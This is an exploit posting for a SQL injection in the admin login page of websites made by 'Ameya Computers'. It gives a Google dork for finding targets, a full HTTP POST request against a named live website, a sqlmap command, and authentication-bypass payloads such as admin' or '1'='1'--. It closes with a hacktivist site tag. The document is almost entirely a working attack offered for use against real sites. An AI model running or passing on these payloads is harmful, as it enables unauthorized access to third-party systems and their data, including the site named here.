# Exploit Author : sc0field
# Exploit Date : 2023-02-13
# Exploit Title : Developed by Ameya Computers LOGIN SQL INJECTİON
# Google Dork : intext:Developed by : Ameya Computers inurl:login.php
Live :
SQL Request :
POST /reviews/admin/login.php HTTP/1.1
Host: jeevanrekhaayurved.com
Cookie: PHPSESSID=oisalk8pvefn8rgdb6p1k3j5uq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: https://jeevanrekhaayurved.com
Referer: https://jeevanrekhaayurved.com/reviews/admin/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user_name=%payload%&password=%payload%&login=LOGIN
Exploit:
sqlmap -r request.txt -p user_name && -p password --batch
**Payload ->
Username payload : admin'%20or%20'1'%3d'1'--
Password payload : '-'
Error : mysql_num_rows() syntax
###########################################HACKTIVIZM.ORG#######################################
